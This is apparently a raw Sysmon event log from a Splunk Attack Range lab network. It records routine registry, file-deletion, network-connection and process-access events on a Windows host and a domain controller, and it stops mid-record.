08:10:57.233{0C1E0330-0490-60E8-1400-00000000D001}740C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{2B0C185B-F983-408E-82DE-41C78B045D4C}\Hostnamewin-host-623 13241300x8000000000000000810961Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 08:10:57.233{0C1E0330-0490-60E8-1400-00000000D001}740C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{2B0C185B-F983-408E-82DE-41C78B045D4C}\RegisteredSinceBootDWORD (0x00000001) 13241300x8000000000000000810960Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 08:10:57.233{0C1E0330-0490-60E8-1200-00000000D001}980C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{2b0c185b-f983-408e-82de-41c78b045d4c}\DhcpConnForceBroadcastFlagDWORD (0x00000000) 13241300x8000000000000000810959Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 08:10:57.233{0C1E0330-0490-60E8-1200-00000000D001}980C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{2b0c185b-f983-408e-82de-41c78b045d4c}\IsServerNapAwareDWORD (0x00000000) 13241300x8000000000000000810958Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 08:10:57.233{0C1E0330-0490-60E8-1200-00000000D001}980C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{2b0c185b-f983-408e-82de-41c78b045d4c}\AddressTypeDWORD (0x00000000) 13241300x8000000000000000810957Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 08:10:57.233{0C1E0330-0490-60E8-1200-00000000D001}980C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{2b0c185b-f983-408e-82de-41c78b045d4c}\LeaseTerminatesTimeDWORD (0x60ec0721) 13241300x8000000000000000810956Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 08:10:57.233{0C1E0330-0490-60E8-1200-00000000D001}980C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{2b0c185b-f983-408e-82de-41c78b045d4c}\T2DWORD (0x60ec055f) 13241300x8000000000000000810955Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 08:10:57.233{0C1E0330-0490-60E8-1200-00000000D001}980C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{2b0c185b-f983-408e-82de-41c78b045d4c}\T1DWORD (0x60ec0019) 13241300x8000000000000000810954Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 08:10:57.233{0C1E0330-0490-60E8-1200-00000000D001}980C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{2b0c185b-f983-408e-82de-41c78b045d4c}\LeaseObtainedTimeDWORD (0x60ebf911) 13241300x8000000000000000810953Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 08:10:57.233{0C1E0330-0490-60E8-1200-00000000D001}980C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{2b0c185b-f983-408e-82de-41c78b045d4c}\LeaseDWORD (0x00000e10) 13241300x8000000000000000810952Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 08:10:57.233{0C1E0330-0490-60E8-1200-00000000D001}980C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{2b0c185b-f983-408e-82de-41c78b045d4c}\DhcpServer10.0.1.1 13241300x8000000000000000810951Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 08:10:57.233{0C1E0330-0490-60E8-1200-00000000D001}980C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{2b0c185b-f983-408e-82de-41c78b045d4c}\DhcpSubnetMask255.255.255.0 13241300x8000000000000000810950Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 08:10:57.233{0C1E0330-0490-60E8-1200-00000000D001}980C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{2b0c185b-f983-408e-82de-41c78b045d4c}\DhcpIPAddress10.0.1.15 13241300x8000000000000000810949Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 08:10:57.233{0C1E0330-0490-60E8-1200-00000000D001}980C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{2b0c185b-f983-408e-82de-41c78b045d4c}\DhcpInterfaceOptionsBinary Data 23542300x8000000000000000810948Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:56.999{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AE09A5C08CF946994A7E14860DB80D28,SHA256=B3BA21A5255DE1771FA3897619C22653AEA032B4AE1504D137F1DD01A74344E1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055703Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:57.479{466BC892-02BC-60E8-2A00-00000000CF01}2928NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055708Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:58.613{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=70B8D40A6E4C2F8E5824855E2FCE01FD,SHA256=138F35CD41D0C58EC2011736EB07076E246DC66439ACD2E1C245A03C64AFC628,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810975Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:57.382{0C1E0330-0490-60E8-1200-00000000D001}980C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudptruefalse10.0.1.15win-host-623.attackrange.local68bootpcfalse10.0.1.1ip-10-0-1-1.eu-central-1.compute.internal67bootps 23542300x8000000000000000810974Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:58.015{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=245865479753D9195FE71A9585376088,SHA256=AA5CCC14DDAFDD3ECA22A66557818418224D89545D733AD2547953F30E60141E,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001055707Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:50.763{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-890.attackrange.local53domainfalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal51230- 354300x80000000000000001055706Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:50.762{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-890.attackrange.local53domainfalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal63435- 23542300x80000000000000001055705Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:58.263{466BC892-5A42-60E8-C510-00000000CF01}7816ATTACKRANGE\bobC:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exeC:\Users\bob\AppData\Local\Microsoft_Corporation\powershell_ise.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\7816.xml~RFf7a6cdc.TMPMD5=4553D3891EC8198EC956E59A7FA89664,SHA256=7DA31B28073EC76DCCA7EDFC3709014058FE36DCB6626D30538493EE344D57A6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055711Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:59.632{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AB12367DCFE7CA126C3ED428722671A9,SHA256=55115B7CB4B192FBD454CE5325AEB450BA1BA52AF470D2E946D438A7943C9789,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000810979Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:59.688{0C1E0330-048F-60E8-0B00-00000000D001}6282788C:\Windows\system32\lsass.exe{0C1E0330-048D-60E8-0100-00000000D001}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96ef2|C:\Windows\system32\kerberos.DLL+793e4|C:\Windows\system32\kerberos.DLL+1443f|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+2b3f4|C:\Windows\system32\lsasrv.dll+30949|C:\Windows\system32\lsasrv.dll+2e2a7|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+15e0d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 354300x8000000000000000810978Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:57.391{0C1E0330-0490-60E8-1400-00000000D001}740C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetruea00:10f:0:0:c810:752:c94:ffff-62139-truee000:fc:0:0:0:0:0:0-5355llmnr 354300x8000000000000000810977Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:57.391{0C1E0330-0490-60E8-1400-00000000D001}740C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetruefe80:0:0:0:953:af5f:887a:72awin-host-623.attackrange.local62139-trueff02:0:0:0:0:0:1:3-5355llmnr 23542300x8000000000000000810976Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:59.016{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2650FC5EBDD43C44519E6EC79F56D451,SHA256=893D85834EEF7BDDA5C97F29CB9FE4976A70CCA480C7459182A2CAD6A74FC644,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001055710Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:50.986{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local62015-false10.0.1.12-8089- 354300x80000000000000001055709Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:50.910{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-890.attackrange.local53domainfalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal60126- 10341000x80000000000000001055721Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:00.747{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+1549f7|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000001055720Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:00.747{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+154962|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000001055719Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:00.747{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+154947|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f 10341000x80000000000000001055718Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:00.747{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+154947|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336 23542300x80000000000000001055717Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:00.747{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms~RFf7a7690.TMPMD5=FEEDDF0B48ACBAE2DF2C13E094BA61E1,SHA256=564E4AC53FEF38F8EC2ADC3773CA3AE2E546D9CF626CDED40CA8B8DCCA4D789B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055716Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:00.694{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\aborted-session-pingMD5=01C92B658847BD0E90CD438B4E57EEBA,SHA256=F3C819DD85867944E34047DB8E582756EBA1D55B897E565103F24AC9B1F7893B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055715Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:00.679{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5108EDF48AE8798ACE9008C936792642,SHA256=AF28F4E3A40ABA027E4CD5C13B37F7E00A5E1993C40E0BC45EA31F4F98A355C8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055714Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:00.679{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5A3D14D22F6257B0574F6AC85AA6F9D9,SHA256=B4472BCF04709C1CBBFC163786641FE1BBE70726CA71B9BEFE57795AD06B5216,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055713Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:00.632{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=458AD15C353CAAA2AEEE8E4DCF1AE051,SHA256=0EAF074DAA312453BE5A1BAC498BBBE359F7B2455E1D2CFA8BE0F1B5388BE681,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810981Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:58.398{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57505-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000810980Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:00.031{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F9783CDAAC2F01490AAF88D55A4D791A,SHA256=52D4BD73C992F4F75CC973AB0CAD223F0EC6A0222F53DF9212646B88238B850A,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001055712Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:52.569{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local62016-false10.0.1.12-8000- 23542300x80000000000000001055736Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:01.962{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=72555D7F097589B58CDF6422E148B08E,SHA256=23D2BA9B169A2B633FDF6CEA2384AAA701BC3DB7437806078DEE3DB07F8DDCC8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055735Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:01.962{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=4227AFEC3E0EDBC267A80EBDE979A956,SHA256=865602E1C16405E9ED1FF6069033875FA48462D2E2EEF43994688C1B7E06D90B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055734Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:01.947{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=58DCA98D11296AA89C6FBBD671BDF6BB,SHA256=8280D5B3EDD0CA195905544706CCE29489497CF22AEA8C61AF4E831D232ACA52,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055733Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:01.947{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=FEE052AAE13ED1FFAE448B679DC72EAC,SHA256=F872920256BE21DDB33D1A22E4B038A6D6080CB34893A5A9543EDA832A2B939F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055732Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:01.947{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=CEE9F4C620C90BD391C13B52683E5812,SHA256=49ABA5C23295B307CCFC497800DEDAF10B4B9544FC12B8881F35A915CCB7D5FD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055731Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:01.947{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=6D4B0AB0C6D75AE80524259846B9C42C,SHA256=6E4A4CAADAA9F534F32E97B56F3E1A9667B56C1690BF3465DB07A1B8F91A3F88,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055730Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:01.947{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=4F6BBDC143F1017C82D9C5EE240E7913,SHA256=165FA0005D552CD250DE1D976DFC02A828A3C0004DDD219449F4C83544536258,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055729Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:01.931{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=479CDEB5C83763F1F3606852AF8C0F97,SHA256=2A9D8141DD947D34DD1DD8A38023C13A7660D2E8EC799471351AC5F224F4D4BA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055728Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:01.931{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=51BB1C4D57D113B42C172C9F950E87A2,SHA256=D262565B94C67608B6F5F5F9079647B194CC5D4C0E92E6CCDFE3DC8B8E07F918,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055727Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:01.931{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=EF84E159580C8D550579012D63667E39,SHA256=B8FBCEF4463CE356B3EDA54AE26CABEB6E8C460F0638D937E45C7A0750E7A3F9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055726Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:01.931{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=5BC4AC5F042CAA61AD1F692B396DF02D,SHA256=D565659BDBF2568C5F5C2EAACBDE3D9B2A0FA1201186409A21DB88F306D0C69F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055725Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:01.894{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 